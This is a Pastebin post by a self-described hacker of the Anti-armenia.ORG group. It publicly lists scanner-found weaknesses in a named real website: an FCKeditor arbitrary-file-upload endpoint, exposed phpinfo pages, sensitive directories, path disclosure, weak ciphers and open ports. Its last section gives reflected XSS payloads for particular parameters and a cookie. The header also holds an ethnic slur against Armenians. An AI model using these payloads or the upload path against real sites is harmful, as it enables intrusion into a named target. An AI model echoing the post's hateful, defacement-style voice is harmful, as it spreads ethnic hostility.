Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Salamlar. Men Avatar Fearless. Bu Gun Sizlere Tapdigim XSS Acigin gosterecem.
- _____ __
- / _ \___ _______ _/ |______ _______
- / /_\ \ \/ /\__ \\ __\__ \\_ __ \
- / | \ / / __ \| | / __ \| | \/
- \____|__ /\_/ (____ /__| (____ /__|
- \/ \/ \/
- #Target Site : http://idram.am/
- R3SP3CT T0 : All My Bro*S
- Especially BOT_25
- Gr33t`Z T0 : All Anti-armenia.ORG members & AA Team
- Anti-armenia.ORG
- Fuck All Armenian!!!
- Video :
- http://youtu.be/J0fBXM-zGFo
- Images :
- http://s13.postimage.org/cxw0a1646/idram.jpg
- http://i026.radikal.ru/1207/54/5dcceaaf3330.png
- Vulnerabilities :
- +--------------------------------------------------------------------------------------------------------------------------------+
- Insecure transition from HTTP to HTTPS in form post :
- /
- / (5d144d46073279bbdaefae2bc56f6d4d)
- /index.php
- /index.php (093e5196576bae758d31b492fa26c443)
- /index.php (4884fbe73df571d23e705eba2c3449ee)
- /index.php (4f6d79019ed3bc622402903d9ff7e4d2)
- /index.php (5d144d46073279bbdaefae2bc56f6d4d)
- /index.php (5e6d83c1b69b0be910b7fb68d28d431d)
- /index.php (742372cf6944623faf985bef07990d99)
- /index.php (84d8bb087daaacc71f3b02efaaae52e2)
- /index.php (91918dbd3109a187ac6397af29e49880)
- /index.php (fa8def2e93a70ffcc53e51b68f5ff902)
- +--------------------------------------------------------------------------------------------------------------------------------+
- |
- +--------------------------------------------------------------------------------------------------------------------------------+
- FCKeditor Arbitrary File Upload :
- /fckeditor/editor/filemanager/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=/
- +--------------------------------------------------------------------------------------------------------------------------------+
- |
- +--------------------------------------------------------------------------------------------------------------------------------+
- phpinfo() function :
- /info.php
- /images/info.php
- +--------------------------------------------------------------------------------------------------------------------------------+
- |
- +--------------------------------------------------------------------------------------------------------------------------------+
- Possible Sensitive Directories :
- /fckeditor
- /fckeditor/editor
- /fckeditor/editor/_source
- /fckeditor/editor/filemanager
- /images/fckeditor
- /images/mail
- /images/temp
- /images/upload
- /polling/admin
- /upload
- +--------------------------------------------------------------------------------------------------------------------------------+
- |
- +--------------------------------------------------------------------------------------------------------------------------------+
- Possible Sensetive Files :
- /images/error_log
- /images/info.txt
- /info.txt
- +--------------------------------------------------------------------------------------------------------------------------------+
- |
- +--------------------------------------------------------------------------------------------------------------------------------+
- Session Cookie without Secure Flag Set :
- Cookie name: "PHPSESSID"
- Cookie domain: "idram.am"
- +--------------------------------------------------------------------------------------------------------------------------------+
- |
- +--------------------------------------------------------------------------------------------------------------------------------+
- Password type input with autocomplete enabled :
- /
- /index.php (093e5196576bae758d31b492fa26c443)
- /index.php (4884fbe73df571d23e705eba2c3449ee)
- /index.php (4f6d79019ed3bc622402903d9ff7e4d2)
- /index.php (5e6d83c1b69b0be910b7fb68d28d431d)
- /index.php (742372cf6944623faf985bef07990d99)
- /index.php (84d8bb087daaacc71f3b02efaaae52e2)
- /index.php (91918dbd3109a187ac6397af29e49880)
- /index.php (fa8def2e93a70ffcc53e51b68f5ff902)
- /index1.php
- /polling/admin
- /polling/admin/index.php
- /polling/admin/index.php (dba2719d6248dd8f3dc76fd280b759f9)
- +--------------------------------------------------------------------------------------------------------------------------------+
- |
- +--------------------------------------------------------------------------------------------------------------------------------+
- require_once() FUnction error :
- Warning: require_once(/home/www/vhosts/edram.am/www/htdocs/include/lng.php): failed to open stream: No such file or directory in /var/www/vhosts/idram.am/www/htdocs/images/include/define.php on line 121 Fatal error: require_once(): Failed opening required '/home/www/vhosts/edram.am/www/htdocs/include/lng.php' (include_path='.:/usr/share/pear:/usr/share/php') in /var/www/vhosts/idram.am/www/htdocs/images/include/define.php on line 121
- +--------------------------------------------------------------------------------------------------------------------------------+
- |
- +--------------------------------------------------------------------------------------------------------------------------------+
- http://www.idram.am/mootools/mootools.js
- +--------------------------------------------------------------------------------------------------------------------------------+
- |
- +--------------------------------------------------------------------------------------------------------------------------------+
- SSL Weak Ciphers:
- Weak SSL ciphers (SSL3 on port 443):
- SSL3_CK_RSA_DES_64_CBC_SHA - Low strength
- SSL3_CK_EDH_RSA_DES_64_CBC_SHA - Low strength
- +--------------------------------------------------------------------------------------------------------------------------------+
- |
- +--------------------------------------------------------------------------------------------------------------------------------+
- List Of Open TCP Ports :
- Description
- Open Port 80 / http
- Port Banner:
- HTTP/1.1 200 OK
- Date: Fri, 20 Jul 2012 23:22:14 GMT
- Server: Apache
- Last-Modified: Fri, 27 Apr 2012 09:57:21 GMT
- ETag: "12e01a6-d-4bea62166f0ab"
- Accept-Ranges: bytes
- Content-Length: 13
- Connection: close
- Content-Type: text/html; charset=UTF-8
- ...
- --------------------------------------------------------------------------------
- Open Port 443 / https
- Port Banner:
- <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
- <html><head>
- <title>400 Bad Request</title>
- </head><body>
- <h1>Bad Request</h1>
- <p>Your browser sent a request that this server could not understand.<br />
- Reason: You're speaking plain HTTP to an SSL ...
- +--------------------------------------------------------------------------------------------------------------------------------+
- |
- +--------------------------------------------------------------------------------------------------------------------------------+
- Error_Log :
- http://pastebin.com/qc9vY31K
- +--------------------------------------------------------------------------------------------------------------------------------+
- |
- +--------------------------------------------------------------------------------------------------------------------------------+
- Other Attack Method'S :
- +--------------------------------------------------------------------------------------------------------------------------------+
- This vulnerability affects /fckeditor/editor/filemanager/connectors/php/connector.php
- URL encoded GET input CurrentFolder was set to 1<ScRiPt >prompt(976928)</ScRiPt>
- +--------------------------------------------------------------------------------------------------------------------------------+
- This Vulnerability Effects to /index.php
- Cookie input idram_ID was set to ' onmouseover=prompt(964243) bad='
- The input is reflected inside a tag element between single quotes.
- _________________________________________________________________
- URL encoded GET input level_id was set to " onmouseover=prompt(948434) bad="
- The input is reflected inside a tag element between double quotes.
- _________________________________________________________________
- URL encoded GET input level_id was set to " onmouseover=prompt(917527) bad="
- The input is reflected inside a tag element between double quotes.
- _________________________________________________________________
- URL encoded GET input level_id was set to " onmouseover=prompt(983304) bad="
- The input is reflected inside a tag element between double quotes.
- _________________________________________________________________
- +--------------------------------------------------------------------------------------------------------------------------------+
- This vulnerability affects /index1.php.
- URI was set to "onmouseover=prompt(947127)>
- The input is reflected inside a tag element between double quotes.
- +--------------------------------------------------------------------------------------------------------------------------------+
- This vulnerability affects /polling/admin/index.php.
- URI was set to "onmouseover=prompt(965520)>
- The input is reflected inside a tag element between double quotes.
- +--------------------------------------------------------------------------------------------------------------------------------+
- This vulnerability affects /.
- URI was set to "onmouseover=prompt(947127)>
- The input is reflected inside a tag element between double quotes.
- +--------------------------------------------------------------------------------------------------------------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement